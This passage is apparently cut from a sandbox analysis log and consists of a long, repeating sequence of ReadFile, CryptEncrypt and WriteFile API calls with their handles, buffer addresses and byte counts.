lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.700] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.700] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.700] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.700] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.700] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.701] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.701] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.701] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.701] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.701] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.701] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.702] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.702] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.702] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.702] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.702] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.702] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.702] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.702] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.702] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.702] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.702] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.702] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.702] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.703] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.703] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.703] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.703] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.703] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.703] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.704] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.704] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.704] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.704] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.704] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.705] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.705] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.705] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.705] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.705] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.705] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.705] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.705] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.705] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.705] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.705] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.705] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.706] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.706] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.706] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.706] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.706] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.706] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.707] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.707] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.707] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.707] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.707] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.708] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, 